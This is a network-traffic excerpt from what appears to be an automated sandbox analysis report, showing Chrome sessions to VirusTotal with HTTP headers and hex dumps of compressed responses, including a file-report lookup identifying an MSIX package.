                                                                                                                                                                                                                    Data Ascii: R<#\<Cn2HacHV"@XH5-0[Z#O>(KD=ag9t=5F>^q\$!ChVj&+8Jp7~Yqjny|W?80eimJ>^?&RLY?BUSC
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC1408INData Raw: c6 fa 40 ce c5 98 6d b5 ff 8d 9d 5c 25 df fa e1 31 72 de cd 7d 49 c6 04 6e 36 a0 ed cf dc d6 1f 41 2c 46 26 57 22 a7 1a 8a 65 81 d8 ef d8 eb 87 cc 08 ac 13 5c 10 f1 0e 71 4c d4 ba f2 75 df 2d c2 ea 30 86 43 5b 29 89 74 b5 2a 0b 94 55 58 d7 21 93 d9 df c3 27 56 c8 1d cf 4e 34 6a 8b 19 22 59 11 a3 32 a5 64 f9 8f 9f 4d 46 d9 62 48 74 c4 56 56 18 12 51 49 7b af c9 92 c8 92 b0 84 54 57 3e 86 03 4a 47 3e 41 2e 91 24 a5 8d 33 81 43 eb 14 38 98 9a 49 d8 02 0a 0c 2e a7 16 1e ed 1b 5b 26 d7 ff e7 58 54 5b cc 92 ef b2 f4 83 ac b3 4c cb 2a 9f 7a eb 64 e8 4b ac 6b d9 f1 aa e4 11 06 57 04 99 25 58 13 a8 1e 09 aa 26 c4 0a 8c 63 0c 5d e1 05 73 0c 34 42 e6 3a 0a 94 9a 08 cb aa 20 06 6a 1f db c4 17 a5 dd 03 2d 8d fc dd 91 45 72 cd 63 23 e4 ac ed 22 ee fe 38 9c 9a 76 96 2f
                                                                                                                                                                                                                    Data Ascii: @m\%1r}In6A,F&W"e\qLu-0C[)t*UX!'VN4j"Y2dMFbHtVVQI{TW>JG>A.$3C8I.[&XT[L*zdKkW%X&c]s4B: j-Erc#"8v/
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC1408INData Raw: e5 c1 b1 35 40 78 5e 20 cf 0b a4 35 53 b0 bb 98 1e bd cc d9 ca a5 58 e7 a7 ab c5 bc 7f b8 91 e8 c2 e0 8d 3c 2f 90 e7 05 32 36 05 4c 7c 02 d9 02 19 49 f6 b7 52 2c 59 44 4b 1c ff f9 e1 a3 e4 ed de 79 e1 a2 79 58 de 21 13 1c 93 e7 05 f2 bc 40 20 0c 50 da 83 8d 2f 91 54 4e 10 5d d5 13 5e d5 f6 99 db 4a e4 8a 07 86 c8 2f 3e 9a 8b 42 a5 b6 78 87 3c 2f 10 58 86 e7 05 32 09 a9 f2 8b e4 3d 9f 58 24 af cc 95 34 36 22 3f 14 06 f1 95 fb 0e 93 17 df 9b 21 f3 80 f5 00 a0 23 3b 14 92 61 a2 f0 20 13 c8 f3 02 b9 35 87 f2 c4 0b 14 2d 93 fa 7f 73 e4 2f ba d9 05 b3 cb f5 c4 56 81 e3 f9 d9 12 ee 5f dc 35 48 0e fc 7a 3a 9a 35 54 f1 6d 1d de 21 cc f5 7b 5e 20 cf 0b 04 56 08 fe b3 b6 50 f6 c5 3b 6a 9d bf 24 ad 93 6d 8f 96 43 ea 8f b8 7d 66 99 2c 2f 24 12 63 e2 1b 41 e5 7b 5e 20
                                                                                                                                                                                                                    Data Ascii: 5@x^ 5SX</26L|IR,YDKyyX!@ P/TN]^J/>Bx</X2=X$46"?!#;a 5-s/V_5Hz:5Tm!{^ VP;j$mC}f,/$cA{^
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC1280INData Raw: 47 7e 41 e8 33 2d 24 5a 87 ff 76 26 21 d1 2c 73 32 8b 1d ca a5 7c f6 fc 62 23 f9 27 ac fd 2d b2 e8 d7 b8 d9 c3 3a c6 a6 51 2d 55 16 db 40 be 11 37 68 cc 14 62 13 61 98 22 0b 59 14 47 75 1e 24 93 99 f6 90 e6 16 2b 2c 0e 7f 75 cf e1 78 21 7b 0c e5 59 16 d4 b8 0a 9c e2 62 52 79 da 8b f2 08 52 5e e5 f3 59 6e 1e ec 96 08 79 0a d6 05 28 70 bf a9 63 d3 db 18 14 01 f2 3b 30 c4 0f 32 ac 74 53 12 61 b6 da 14 e2 f0 f2 07 b3 51 39 23 9b e5 15 47 7d f8 e4 57 29 8e 81 17 2c 0b 94 ec b0 b2 24 5a ce e4 17 cb 89 11 3d 8d ce 91 6f 17 98 73 0b 8c e2 b8 80 ba 58 e2 93 ed d0 ae 00 53 81 e1 6c a6 dc a1 18 70 08 16 88 26 ba de 2c cd 87 4e 6c 83 ab bf d0 59 16 82 ba 0a 7c f2 ab 98 34 33 58 5a f0 b4 ce c5 e3 87 0a ec 3a c0 39 93 9f a8 ed e5 62 fb b1 d5 2c d9 91 9f 25 c4 e5 56 89
                                                                                                                                                                                                                    Data Ascii: G~A3-$Zv&!,s2|b#'-:Q-U@7hba"YGu$+,ux!{YbRyR^Yny(pc;02tSaQ9#G}W),$Z=osXSlp&,NlY|43XZ:9b,%V
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC572INData Raw: bd 45 f9 b4 0f ee 6a b3 b4 a5 01 e3 d2 32 c4 fb 3c 2f 90 e7 05 ca 92 17 88 f6 41 c3 be ae e6 05 92 99 42 e1 3e e5 79 81 3c 2f 50 46 f2 a7 68 1f c4 26 75 b5 a0 10 69 a6 51 4d 09 74 a3 37 9e 17 c8 f3 02 69 ca 4f eb fc 46 0e b0 2a 1f 90 b6 82 0c 58 09 3c 2f 90 e7 05 b2 20 bf d6 f9 03 1b 70 1f 25 2f 10 24 73 4c bd f0 70 9f c2 9a 18 9e 17 28 bb e3 6d 24 aa 32 90 9f d6 f9 b5 92 5f 20 5e 20 85 62 b0 f9 01 3a 13 ec a3 9e b9 ad 17 e6 79 81 3c 2f 10 13 ed d9 67 cb ec 41 f1 02 01 7c 02 1e 33 44 43 a4 8b 90 c4 88 8d d1 c4 f3 02 e9 c9 c7 44 d2 b2 e4 05 a2 39 27 9b a1 4e 34 2f 10 a2 92 8c 8f 10 f5 a8 cc 14 cf 0b e4 79 81 14 01 8a 1e 49 92 2b d0 68 e3 79 81 24 23 be d2 de a2 f8 8c 2a 48 c9 7a fc df 65 7e 01 9a 9c 69 45 f9 ad c0 0b 44 fb 8c 09 b6 c7 6a 35 18 50 11 52 db
                                                                                                                                                                                                                    Data Ascii: Ej2</AB>y</PFh&uiQMt7iOF*X</ p%/$sLp(m$2_ ^ b:y</gA|3DCD9'N4/yI+hy$#*Hze~iEDj5PR


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    99192.168.2.164984874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC708OUTGET /gui/sha256.worker.d774f311f4702f912904.worker.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Dest: worker
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 6572657c95f36f81e174de107d5cdfef
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 17:57:16 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 17:57:16 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 525488
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a bd 0d 0a 30 30 30 30 30 30 30 31 0d 0a eb 0d 0a 30 30 30 30 30 30 30 31 0d 0a 56 0d 0a 30 30 31 0d 0a 1b 0d 0a 30 66 66 31 0d 0a 49 b6 ef fb f9 ac a7 50 d5 58 c5 90 ac 34 95 99 4a dd c0 59 b5 31 a6 ca 74 fb d6 60 77 55 37 03 18 32 08 50 19 24 5a 12 d8 94 71 bf cf 7e 8e fd 62 fb f7 9f 11 91 99 02 7c eb ae
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001V0010ff1IPX4JY1t`wU72P$Zq~b|
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1408INData Raw: 74 11 1d 46 13 f4 a5 75 04 a7 dc dd ed 87 08 09 29 a7 b1 30 cf 68 1a 8d a2 71 34 d1 2c 4a 09 38 f0 14 f3 b2 83 02 a5 e7 dd bd e9 4e 2c 3d ea 46 e1 17 23 9e da af 54 cf 52 69 56 37 15 7e 31 ad c3 3c 8b ce f3 64 f5 fc c1 c1 ea b9 28 2c 14 5c e6 a3 c0 ba 7b e3 9d 23 38 cf d3 6a 6f b2 73 2a d5 65 2c bb 37 33 2a 5d a8 df c3 66 53 4a 70 64 8d e1 78 5e 53 c3 f2 b5 8b 9b af 9d 14 af 5d f1 9a 1a bb d7 d4 b0 7c 4d bc bf 30 da 51 f1 da 31 af a9 b1 7b 4d 0d cb d7 04 f2 c2 6b a7 e1 b5 d5 93 fc 12 f4 ec 83 94 2b 50 71 fc e1 32 af 0f c2 64 4d 4e 07 d5 09 9b 9c 0e 2a 93 96 40 0e fc bc 1b e5 c4 e9 43 63 06 59 77 6f 78 78 7c 1f 25 06 ca 3e 90 f5 d0 c7 95 e0 f0 68 f0 70 54 50 e1 fb 28 d1 51 f6 71 54 f6 71 ac 3e 3c 4e 7c 1f 15 bc f8 3e 4a dc 94 7d 9c 96 7d 88 89 40 91 e3 1f
                                                                                                                                                                                                                    Data Ascii: tFu)0hq4,J8N,=F#TRiV7~1<d(,\{#8jos*e,73*]fSJpdx^S]|M0Q1{Mk+Pq2dMN*@CcYwoxx|%>hpTP(QqTq><N|>J}}@
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1408INData Raw: 18 15 d6 ed 23 64 fd be d8 09 04 f4 50 d7 68 61 09 21 62 cf b0 08 01 94 cf b0 2d f0 05 7a 1b ca b5 11 1e 49 2b fa 56 ba 08 a2 a1 33 7a c4 bc 28 ba 0e 48 56 74 97 61 98 e0 5d 54 3b 0a 16 cd d7 6a f7 35 5b 46 4a da d0 04 7d dc cf e0 59 18 03 f6 a2 27 50 04 67 22 c8 60 d3 38 07 5c 48 9e 60 0d 26 85 22 89 51 91 f4 85 e9 92 02 c3 fa 00 3f 86 06 99 a1 07 30 80 21 ca 0c 58 2c b0 4d 56 c6 b6 db 46 a1 45 18 56 ec 18 30 4a 3b a0 4a 19 4f d6 0b 55 0d 7b ca 8c a0 55 19 18 da c1 a5 52 0a a8 59 86 c5 22 61 06 a0 a4 b4 06 ba 9f bb a6 58 63 54 a7 11 0c 02 c4 fd 7e 47 e3 a2 20 4d c1 74 90 18 5e 94 46 96 48 d0 13 00 77 d0 c1 5d 58 06 80 80 00 b5 82 b9 04 f1 a8 39 94 4e 0c 26 d1 6a 34 40 33 4b 90 51 84 28 ba b6 66 9b f5 a1 08 93 10 69 e0 74 f4 68 87 1e e0 68 a6 08 19 44 66
                                                                                                                                                                                                                    Data Ascii: #dPha!b-zI+V3z(HVta]T;j5[FJ}Y'Pg"`8\H`&"Q?0!X,MVFEV0J;JOU{URY"aXcT~G Mt^FHw]X9N&j4@3KQ(fithhDf
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC412INData Raw: b0 e2 67 e9 47 e2 6e 13 23 78 14 b6 82 81 15 53 65 29 d2 08 8f 20 8c 32 db 18 1c 8d 89 74 42 4d cc 1f a0 31 0d 0d c1 04 e5 6f a3 13 34 57 f9 d0 90 82 4b 80 86 2a 52 f7 68 2d f4 b9 88 8c 10 63 df 41 b7 29 45 39 26 a6 3d 89 db 19 d8 b2 0b 8a 3b d1 39 60 45 5a 94 e0 41 14 06 0e fa c2 eb 02 54 39 a5 50 47 e4 82 a6 68 6b a0 86 23 49 7f e0 03 49 91 82 6f 29 11 94 80 54 8f c4 49 c9 12 39 00 82 8f f8 1c 87 40 7a 16 46 40 72 70 48 85 2a ac 18 c4 13 ad 24 d7 f4 1a 61 de 80 93 dc 04 8a 0d 6d ac a0 4e 36 05 b4 c8 0a 4a c9 2a 22 63 3a 0c 84 66 c0 06 49 f0 10 66 34 82 42 0b 41 8a 6e a5 11 43 31 19 04 12 5c 42 5d a9 30 84 97 ce a0 3f 2c 2a f5 df c1 e8 10 d3 c1 79 e8 47 b2 46 88 2f 4d 11 24 98 d0 a2 04 8c 0f 92 8e 8f 4e f0 a2 30 a9 83 0b 0c 93 62 61 71 29 f0 c1 15 de 90
                                                                                                                                                                                                                    Data Ascii: gGn#xSe) 2tBM1o4WK*Rh-cA)E9&=;9`EZAT9PGhk#IIo)TI9@zF@rpH*$amN6J*"c:fIf4BAnC1\B]0?,*yGF/M$N0baq)
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 9d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 28 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 80 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 12 0d 0a 30 30 30 30 30 30 30 31 0d 0a 58 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a c0 0d 0a 30 30 30 30 30 30 30 31 0d 0a 2a 0d 0a 30 30 30 30 30 30 30 31 0d 0a ba 0d 0a 30 30 30 30 30 30 30 31 0d 0a 05 0d 0a 31 0d 0a 20 0d 0a 30 66 66 32 0d 0a 04 9e ac 08 7c 0f 72 63 dc 28 ac a7 ec ae 02 2d 98 09 55 82 49 82 eb 00 8f a1 a5 ba 14 0a 92 80 61 04 49 09 d8 80 b3 c0 30 e1 10 e8 62 30 e9 26 69 32 b0 89 c6 46 c8 74 c9 04 71 f6 d1 34 f4 80 f8 12 9e 28 a1 80 ee 82 13 cd
                                                                                                                                                                                                                    Data Ascii: 0000000100000001(00000001000000010000000100000001{0000000100000001X00000001\0000000100000001*00000001000000011 0ff2|rc(-UIaI0b0&i2Ftq4(
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1408INData Raw: b8 a7 74 22 32 00 29 e2 83 ff ca 73 34 3c 6a 5e d2 09 65 98 10 2a 05 67 5d 7c a0 74 9f e5 9c a0 0a 16 c2 16 c8 90 53 58 1b e1 93 9b 8f 26 03 60 30 8b d3 c6 eb 4a fa 13 ee c0 fb 84 bc 60 5f 76 14 66 c0 cd 70 56 43 9a 5c ac 6a cf 65 8b c4 1c 80 4f 6f b2 15 cc 08 87 04 d6 57 03 44 4c 99 3b 28 8a 38 68 f5 00 3e 07 f1 98 5a 22 57 44 0e 71 c6 a4 cb 0e 72 09 ed 51 78 e0 08 ed 8e 9c 28 97 0b 0f f2 18 bd 8e e6 c7 79 43 03 22 25 8c 06 97 29 c8 96 e7 44 1e 02 be 60 60 fc 07 34 21 36 5a 09 1c b4 b8 32 ad e0 13 13 42 6a 8c 9f ea c1 1c 31 05 26 d2 24 80 a1 c8 45 d9 6c 70 af 30 0f 83 00 43 13 89 40 52 58 4d b6 5a c4 81 fd 51 da 06 0e c6 13 be 41 ae c5 f8 28 43 cc 89 ac 0b d6 43 b9 0e 48 86 3d 45 8a a5 e6 91 57 59 02 fa 65 70 3c 04 cc a2 60 50 10 87 69 c5 de 4b f7 58 54
                                                                                                                                                                                                                    Data Ascii: t"2)s4<j^e*g]|tSX&`0J`_vfpVC\jeOoWDL;(8h>Z"WDqrQx(yC"%)D``4!6Z2Bj1&$Elp0C@RXMZQA(CCH=EWYep<`PiKXT
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1408INData Raw: 8a 8d 79 5b 1a 12 8a 49 70 a4 b4 98 85 fa 42 e7 c2 2a 4a 46 e1 79 08 42 44 95 7b 84 b7 9a ab ec a4 22 36 4d 86 ec a0 1c 35 62 29 90 85 a1 97 9b 0f 84 24 13 94 57 d0 24 b1 50 d2 8b 88 31 9a d9 20 c3 ed a4 11 8c 49 07 04 d0 0a 40 c8 b7 c1 ee 00 0e 66 e4 1a c8 f1 26 89 8a 38 f6 87 48 b8 12 24 74 2b 75 81 3a 81 c6 7a 6c d6 1f 7d af 57 64 07 95 8a 8e 98 12 7a 15 75 c2 4d 1e c9 f7 c5 02 4b c1 83 3f 29 6e e8 86 73 27 30 11 4c 68 24 2d 29 0e e1 75 92 17 60 01 8e 21 e2 97 cf 8e 21 96 aa 51 ec a8 d4 3d dc 86 e3 84 dc 2b 42 53 0a 55 5c 28 c6 e2 06 6e 8e b6 44 80 6a dc 37 38 1b 49 d3 92 0c bc 80 ed e5 11 d6 99 49 21 18 04 78 98 0d 26 42 f6 84 44 84 32 15 5c 12 4c 90 e6 26 1c 12 c7 60 52 94 36 c4 15 05 2a ad 84 a1 6c d1 90 08 34 94 02 39 80 20 bd 0a a8 e0 1c 12 49 d4
                                                                                                                                                                                                                    Data Ascii: y[IpB*JFyBD{"6M5b)$W$P1 I@f&8H$t+u:zl}WdzuMK?)ns'0Lh$-)u`!!Q=+BSU\(nDj78II!x&BD2\L&`R6*l49 I
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC41INData Raw: 1b 77 f4 35 1a 8f 2a b5 89 be 24 d6 c1 71 74 ec 98 96 99 84 79 4c 1b be 0c ec 1d 92 79 f6 74 72 48 cd ab bf 43 71 0c 0d 0a
                                                                                                                                                                                                                    Data Ascii: w5*$qtyLytrHCq
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 8a 0d 0a 30 30 30 30 30 30 30 31 0d 0a dd 0d 0a 30 30 30 30 30 30 30 31 0d 0a de 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9c 0d 0a 30 30 30 30 30 30 30 31 0d 0a aa 0d 0a 30 30 30 30 30 30 30 31 0d 0a e0 0d 0a 30 30 30 30 31 0d 0a b1 0d 0a 30 66 66 39 0d 0a 0e a0 76 51 4e b5 f1 7e b6 6c b7 96 0f 06 a7 68 39 4a 20 43 7f be 4a 52 2f 9d 4f 27 07 c3 d9 ac 7c 0d 7a 56 f1 b3 3f 38 3f 57 69 e5 3c bc eb 5f d0 bb 47 a3 f1 e0 54 25 3a 55 66 08 2f 2f 2d 19 74 b7 de 3f 9c fc e4 5f 53 17 a1 c8 a7 e0 e8 2c da 5f a4 c2 4a 12 ed 2f e2 72 25 8d 16 d8 bc 1c 9e b2 35 5f 6e 5c 9b 8b 31 1d 2c df ce e6 d3 d1 f8 f8 5b 2a 3c af ce 87 93 a3 da fc c7 87 2b 57 1f 3c a0 e1 8d 3a 86 db dd 7a ef 4b 01 cb 7e ad 32 2e 3c a6 eb 51 43 dc aa 6a c0 3a 45 cd 2a 9b 63
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000010ff9vQN~lh9J CJR/O'|zV?8?Wi<_GT%:Uf//-t?_S,_J/r%5_n\1,[*<+W<:zK~2.<QCj:E*c
                                                                                                                                                                                                                    2024-04-25 19:55:24 UTC1408INData Raw: 72 81 b6 44 17 39 e4 8f c3 5f 03 47 07 47 71 cc 3f 26 2c 93 1c e0 9c 8c 95 56 d8 39 6b ea 4b 08 f6 2c 38 59 76 0a 16 27 6e f2 29 8e bd 0b ce 8f b3 aa 97 d8 d1 e7 27 32 bc 39 91 20 1a 61 3e d1 55 70 e1 3e 32 13 f8 14 47 ad 01 c3 b3 94 7c 43 a3 38 b7 e8 c6 f9 4e f0 67 69 41 24 13 22 c5 68 15 ce fd 96 e3 78 86 e8 92 e1 e1 b7 df 84 e0 ec ed 08 2e 7e bb b4 e4 fe c2 c3 44 59 13 4b 8a 2d dc 69 44 77 bd 3c 1b 9e 1e 71 38 0e ff 56 5f ac fc be fb b5 e3 d3 c9 eb c1 e9 4b ec ef d2 52 79 5d ed e2 d6 dd 46 f4 cd 68 69 e9 2e 18 6e 4c e0 6c 66 e7 ad 2c 4c 21 dc fb 78 27 6e bc 00 cd 6d 48 fc 1d 75 d0 98 4f af 50 e3 d3 3a 9b b5 1b 1f 70 58 0f c8 08 36 de 5b be 6d 5c 0d 8d a4 2a 4c 61 7c 1b c8 51 86 c4 a3 e5 e3 e1 7c cb 14 c8 5f 07 a7 17 c3 99 f5 5a f0 c6 8d 87 f5 f1 f0 6d
                                                                                                                                                                                                                    Data Ascii: rD9_GGq?&,V9kK,8Yv'n)'29 a>Up>2G|C8NgiA$"hx.~DYK-iDw<q8V_KRy]Fhi.nLlf,L!x'nmHuOP:pX6[m\*La|Q|_Zm


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    100192.168.2.164984974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC943OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTE2NjAxODYxNzItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTIzLjg1NQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC885INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: ba3e03999dd8d70cef4c6e902c522ced
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:25 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 35840
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:25 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 22 2c 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38
                                                                                                                                                                                                                    Data Ascii: { "data": { "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358", "type": "file", "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c4178
                                                                                                                                                                                                                    2024-04-25 19:55:25 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 22 74 72 69 64 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 5f 74 79 70 65 22 3a 20 22 4d 53 49 58 20 57 69 6e 64 6f 77 73 20 61 70 70 20 70 61 63 6b 61 67 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 70 72 6f 62 61 62 69 6c 69 74 79 22 3a 20 38 34 2e 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 5f 74 79 70 65 22 3a 20 22 5a 49 50 20 63 6f 6d 70 72 65 73 73 65 64 20 61 72 63 68 69 76 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "trid": [ { "file_type": "MSIX Windows app package", "probability": 84.1 }, { "file_type": "ZIP compressed archive",
